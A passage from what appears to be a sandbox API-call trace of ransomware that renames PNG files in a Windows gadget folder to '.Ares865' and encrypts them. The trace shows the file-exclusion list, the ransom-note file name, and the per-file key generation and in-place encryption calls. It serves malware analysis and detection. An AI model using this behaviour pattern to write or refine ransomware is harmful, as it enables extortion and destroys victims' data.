lstrcmpiW (lpString1="21.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="aoldtz.exe") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2=".") returned 1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="..") returned 1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="windows") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="bootmgr") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="temp") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="pagefile.sys") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="boot") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="ids.txt") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="ntuser.dat") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="perflogs") returned -1 [0115.722] lstrcmpiW (lpString1="21.png", lpString2="MSBuild") returned -1 [0115.722] lstrlenW (lpString="21.png") returned 6 [0115.722] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png") returned 75 [0115.722] lstrcpyW (in: lpString1=0x2cce48a, lpString2="21.png" | out: lpString1="21.png") returned="21.png" [0115.723] lstrlenW (lpString="21.png") returned 6 [0115.723] lstrlenW (lpString="Ares865") returned 7 [0115.723] lstrlenW (lpString=".dll") returned 4 [0115.723] lstrcmpiW (lpString1="21.png", lpString2=".dll") returned 1 [0115.723] lstrlenW (lpString=".lnk") returned 4 [0115.723] lstrcmpiW (lpString1="21.png", lpString2=".lnk") returned 1 [0115.723] lstrlenW (lpString=".ini") returned 4 [0115.723] lstrcmpiW (lpString1="21.png", lpString2=".ini") returned 1 [0115.723] lstrlenW (lpString=".sys") returned 4 [0115.723] lstrcmpiW (lpString1="21.png", lpString2=".sys") returned 1 [0115.723] lstrlenW (lpString="21.png") returned 6 [0115.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.Ares865") returned 83 [0115.723] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png.ares865"), dwFlags=0x1) returned 1 [0115.724] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.724] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6073) returned 1 [0115.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.725] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.726] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.726] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.726] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ac0, lpName=0x0) returned 0x170 [0115.727] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac0) returned 0x190000 [0115.728] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.729] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.729] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.729] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.729] CloseHandle (hObject=0x170) returned 1 [0115.729] CloseHandle (hObject=0x118) returned 1 [0115.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.730] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="22.png", cAlternateFileName="")) returned 1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="aoldtz.exe") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2=".") returned 1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="..") returned 1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="windows") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="bootmgr") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="temp") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="pagefile.sys") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="boot") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="ids.txt") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="ntuser.dat") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="perflogs") returned -1 [0115.730] lstrcmpiW (lpString1="22.png", lpString2="MSBuild") returned -1 [0115.730] lstrlenW (lpString="22.png") returned 6 [0115.730] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png") returned 75 [0115.730] lstrcpyW (in: lpString1=0x2cce48a, lpString2="22.png" | out: lpString1="22.png") returned="22.png" [0115.730] lstrlenW (lpString="22.png") returned 6 [0115.730] lstrlenW (lpString="Ares865") returned 7 [0115.730] lstrlenW (lpString=".dll") returned 4 [0115.731] lstrcmpiW (lpString1="22.png", lpString2=".dll") returned 1 [0115.731] lstrlenW (lpString=".lnk") returned 4 [0115.731] lstrcmpiW (lpString1="22.png", lpString2=".lnk") returned 1 [0115.731] lstrlenW (lpString=".ini") returned 4 [0115.731] lstrcmpiW (lpString1="22.png", lpString2=".ini") returned 1 [0115.731] lstrlenW (lpString=".sys") returned 4 [0115.731] lstrcmpiW (lpString1="22.png", lpString2=".sys") returned 1 [0115.731] lstrlenW (lpString="22.png") returned 6 [0115.731] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.Ares865") returned 83 [0115.731] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png.ares865"), dwFlags=0x1) returned 1 [0115.732] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6073) returned 1 [0115.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.733] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.733] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.733] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.734] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ac0, lpName=0x0) returned 0x170 [0115.735] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac0) returned 0x190000 [0115.736] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.737] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.737] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.737] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.737] CloseHandle (hObject=0x170) returned 1 [0115.737] CloseHandle (hObject=0x118) returned 1 [0115.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.738] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.738] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23.png", cAlternateFileName="")) returned 1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="aoldtz.exe") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2=".") returned 1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="..") returned 1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="windows") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="bootmgr") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="temp") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="pagefile.sys") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="boot") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="ids.txt") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="ntuser.dat") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="perflogs") returned -1 [0115.738] lstrcmpiW (lpString1="23.png", lpString2="MSBuild") returned -1 [0115.738] lstrlenW (lpString="23.png") returned 6 [0115.738] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png") returned 75 [0115.738] lstrcpyW (in: lpString1=0x2cce48a, lpString2="23.png" | out: lpString1="23.png") returned="23.png" [0115.738] lstrlenW (lpString="23.png") returned 6 [0115.738] lstrlenW (lpString="Ares865") returned 7 [0115.738] lstrlenW (lpString=".dll") returned 4 [0115.738] lstrcmpiW (lpString1="23.png", lpString2=".dll") returned 1 [0115.738] lstrlenW (lpString=".lnk") returned 4 [0115.738] lstrcmpiW (lpString1="23.png", lpString2=".lnk") returned 1 [0115.738] lstrlenW (lpString=".ini") returned 4 [0115.738] lstrcmpiW (lpString1="23.png", lpString2=".ini") returned 1 [0115.739] lstrlenW (lpString=".sys") returned 4 [0115.739] lstrcmpiW (lpString1="23.png", lpString2=".sys") returned 1 [0115.739] lstrlenW (lpString="23.png") returned 6 [0115.739] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.Ares865") returned 83 [0115.739] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png.ares865"), dwFlags=0x1) returned 1 [0115.741] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.741] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5573) returned 1 [0115.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.741] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.742] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.742] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.742] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18d0, lpName=0x0) returned 0x170 [0115.744] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18d0) returned 0x190000 [0115.745] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.746] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.746] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0115.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0115.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.746] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.746] CloseHandle (hObject=0x170) returned 1 [0115.746] CloseHandle (hObject=0x118) returned 1 [0115.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.747] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc163f09, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc163f09, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="24.png", cAlternateFileName="")) returned 1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="aoldtz.exe") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2=".") returned 1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="..") returned 1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="windows") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="bootmgr") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="temp") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="pagefile.sys") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="boot") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="ids.txt") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="ntuser.dat") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="perflogs") returned -1 [0115.747] lstrcmpiW (lpString1="24.png", lpString2="MSBuild") returned -1 [0115.747] lstrlenW (lpString="24.png") returned 6 [0115.747] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png") returned 75 [0115.747] lstrcpyW (in: lpString1=0x2cce48a, lpString2="24.png" | out: lpString1="24.png") returned="24.png" [0115.747] lstrlenW (lpString="24.png") returned 6 [0115.747] lstrlenW (lpString="Ares865") returned 7 [0115.747] lstrlenW (lpString=".dll") returned 4 [0115.747] lstrcmpiW (lpString1="24.png", lpString2=".dll") returned 1 [0115.747] lstrlenW (lpString=".lnk") returned 4 [0115.747] lstrcmpiW (lpString1="24.png", lpString2=".lnk") returned 1 [0115.747] lstrlenW (lpString=".ini") returned 4 [0115.748] lstrcmpiW (lpString1="24.png", lpString2=".ini") returned 1 [0115.748] lstrlenW (lpString=".sys") returned 4 [0115.748] lstrcmpiW (lpString1="24.png", lpString2=".sys") returned 1 [0115.748] lstrlenW (lpString="24.png") returned 6 [0115.748] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.Ares865") returned 83 [0115.748] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png.ares865"), dwFlags=0x1) returned 1 [0115.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5573) returned 1 [0115.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.750] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.750] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.750] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18d0, lpName=0x0) returned 0x170 [0115.754] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18d0) returned 0x190000 [0115.755] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.756] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.756] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.756] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.756] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.757] CloseHandle (hObject=0x170) returned 1 [0115.757] CloseHandle (hObject=0x118) returned 1 [0115.757] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.757] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.757] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.757] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="25.png", cAlternateFileName="")) returned 1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="aoldtz.exe") returned -1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2=".") returned 1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="..") returned 1 [0115.757] lstrcmpiW (lpString1="25.png", lpString2="windows") returned -1 [0115.757] 